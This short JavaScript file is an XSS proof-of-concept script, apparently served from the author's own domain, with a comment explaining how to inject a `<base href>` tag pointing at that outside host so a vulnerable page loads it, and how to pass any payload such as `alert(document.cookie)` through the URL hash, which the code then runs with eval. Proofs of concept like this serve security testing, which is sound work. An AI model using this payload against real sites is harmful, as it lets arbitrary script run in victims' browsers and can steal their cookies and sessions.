/* -----------
XSS Proof of Concept by J0R1AN (Inspired by X55.is)

- Use a payload like `<base href=//xss.jorianwoltjer.com>` to transform all javascript
  references into XSS from this page

- Use `#alert(document.cookie)` on target URL to execute any other payload
----------- */

var code = document.location.hash.slice(1) || 'alert(document.domain)';
try {
    console.log("XSS triggered via", "/");
    eval(code);
} catch(e) {
    console.error(e);
    alert(e);
}